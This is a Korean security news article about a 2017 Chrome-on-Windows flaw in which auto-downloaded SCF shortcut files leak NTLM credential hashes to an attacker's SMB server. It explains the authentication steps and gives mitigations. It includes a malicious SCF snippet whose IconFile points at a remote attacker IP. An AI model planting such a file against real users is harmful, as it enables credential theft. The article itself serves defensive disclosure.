한 보안 연구원이 구글의 윈도우 모든 버전용 크롬 최신 버전의 디폴트 구성에서 원격의 해커가 사용자의 로그인 크리덴셜을 훔치는데 사용할 수 있는 심각한 취약점을 발견했습니다. 

이번에 발견된 취약점은 사용자들이 악성 SCF 파일을 포함하는 웹사이트를 방문하는 것 만으로도 해커가 크롬 및 SMB 프로토콜을 통해 그들 컴퓨터의 로그인 크리덴셜을 훔치도록 허용합니다.

이 기술은 새로운 것은 아니며, 이란의 핵 프로그램을 파괴시키도록 특별히 제작 된 강력한 멀웨어인 Stuxnet이 악용한 적 있습니다. Stuxnet은 시스템 해킹을 위해 윈도우의 바로가기 LNK 파일을 사용했습니다. 

이 공격이 다른 것들과 다른 점은, SMB 인증 관련 공격이 IE와 Edge 이후 처음으로 구글 크롬에서 시연 되었다는 것입니다.

SCF (Shell Command File) 바로가기 파일 포맷은 LNK 파일과 유사하게 동작하며, 바탕화면의 아이콘을 정의하는데 도움을 주는 제한 된 윈도우 익스플로러 명령어 세트를 지원합니다.

보안연구원 Stankovic은 블로그를 통해 “현재 공격자는 크롬 최신 버전과 윈도우를 사용하는 피해자가 그의 웹사이트를 방문하도록 유도하기만 하면, 피해자의 인증 크리덴셜을 재사용할 수 있게 된다.”고 밝혔습니다. 

기본적으로, 바탕화면의 바로가기 링크들은 아이콘/썸네일의 위치, 프로그램의 이름 및 위치를 정의하는 특정 문법의 shell code를 포함하는 텍스트 파일입니다. 

[Shell]

Command=2

IconFile=explorer.exe,3

크롬이 윈도우 SCF 파일을 신뢰하기 때문에, 공격자들은 피해자들이 악성 바로가기 파일을 포함한 자신들의 웹사이트로 방문하도록 속이기만 하면 악성 파일은 피해자에게 확인 창도 띄우지 않고 사용자 시스템에 자동으로 다운로드 될 것입니다. 

사용자가 다운로드 즉시 또는 나중에 다운로드 파일 폴더를 열기만 하면, 이 파일은 아이콘을 받아오기 위해 사용자가 클릭하지 않아도 자동으로 실행 될 것입니다. 

하지만 이 악성 파일은 아이콘 이미지 위치 대신 공격자가 제어하는 원격 SMB 서버의 위치를 포함하고 있습니다.

[Shell]

IconFile=\\170.170.170.170\icon

즉, SCF 파일이 아이콘 이미지를 받아오려고 시도하는 순간 SMB 프로토콜을 통해 공격자가 제어하는 서버와 자동으로 인증해 피해자의 계정 및 해싱 된 패스워드를 넘겨줘 공격자가 크리데셜을 이용해 피해자의 PC나 네트워크 리소스에 인증하는데 사용할 수 있게 되는 것입니다. 

Stankovic은 “아이콘 위치를 원격 SMB 서버로 설정하는 것은 원격 파일 공유와 같은 서비스에 접근할 때 자동으로 인증하는 윈도우의 기능을 악용하는, 이미 알려진 공격 벡터이다.”고 말했습니다.

Stuxnet 공격 이후 마이크로소프트는 LNK파일들이 로컬 리소스만 불러오도록 수정했지만, SCF 파일들은 그대로 두었습니다. 

<이미지 출처 : http://thehackernews.com/2017/05/chrome-windows-password-hacking.html>

윈도우 PC가 자동으로 크리덴셜을 서버로 넘겨주는 이유는 무엇일까?

이는 NTLM 챌린지/응답 인증 메커니즘과 함께 동작하는 SMB 프로토콜을 통한 인증 방식입니다. 즉 LM/NTLM 인증은 아래 4단계로 작동합니다. 

1) 윈도우 사용자(클라이언트)가 서버에 로그인을 시도한다.

2) 서버는 챌린지 값으로 응답하며, 사용자에게 챌린지 값을 사용자의 해싱 된 패스워드로 암호화 후 다시 보내라고 요청한다.

3) 윈도우는 클라이언트의 계정 및 해싱 된 패스워드를 서버로 보내 SCF의 요청을 처리한다.

4) 서버는 클라이언트의 해싱 된 패스워드가 맞을 경우 응답을 캡쳐하고 인증을 승인한다.

위의 3단계와 같이 윈도우는 자동으로 악성 SMB 서버에 피해자의 계정 및 NTLMv2 패스워드 해시를 제공해 인증하려고 시도할 것입니다. 

만약 사용자가 기업 네트워크의 한 부분일 경우, 회사의 시스템 관리자가 해당 사용자에게 할당한 네트워크 크리덴셜들도 공격자에게 보내질 것이며, 피해자가 일반 사용자일 경우, 피해자의 윈도우 계정 및 패스워드가 공격자에게 보내질 것입니다.

물론 크리덴셜은 암호화 되어있지만, 나중에 플레인 텍스트 형태의 패스워드를 얻기 위해 브루트포싱 공격에 이용될 수 있습니다.

또한 이 연구원은 “폴더의 세팅에 상관없이 SCF 파일은 윈도우 탐색기에서 확장명이 없는 상태로 표시 됩니다. 따라서 picture.jpg.scf 파일은 윈도우 탐색기에서 picture.jpg로 표시 될 것입니다.

다수의 마이크로소프트 서비스들이 해싱 된 상태의 패스워드를 받아들이기 때문에, 공격자는 피해자의 OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live 등에 암호화 된 패스워드로 로그인할 수 있어 복호화 과정이 필요가 없게 됩니다.

연구원은 이러한 취약점은 공격자가 조직의 직원들 중 하나로 사칭할 수 있기 때문에 조직에 심각한 위협을 가할 수 있다고 설명했습니다. 공격자가 얻은 권한을 재사용해 나중에 IT 리소스에 접근 및 제어하며 다른 조직원들도 공격하는데 사용할 수 있기 때문입니다. 

로컬 컴퓨터들이 원격 SMB 서버에 쿼리를 할 수 없도록, 방화벽을 통해 로컬 네트워크로부터 WAN으로의 아웃바운드 SMB 연결(TCP 포트 139 및 445)을 차단하면 됩니다. 

또한 구글 크롬에서 설정 -> 고급 설정 보기 -> “다운로드 하기 전 각 파일을 저장할 위치 묻기” 옵션을 선택해 크롬에서 자동으로 다운로드 하지 않도록 설정하는것을 권장합니다.

현재 구글은 이 취약점을 이미 알고 있으며 패치를 준비하는 중이라고 밝혔으나, 패치를 언제 제공할지는 밝히지 않았습니다.